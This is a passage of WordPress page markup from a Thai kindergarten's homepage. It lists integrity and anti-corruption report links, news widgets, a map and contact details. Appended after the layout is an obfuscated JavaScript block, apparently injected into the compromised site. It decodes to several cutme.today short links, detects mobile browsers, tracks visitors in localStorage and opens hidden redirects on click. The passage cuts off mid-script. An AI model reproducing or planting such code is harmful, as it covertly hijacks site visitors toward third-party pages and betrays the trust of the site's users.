href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 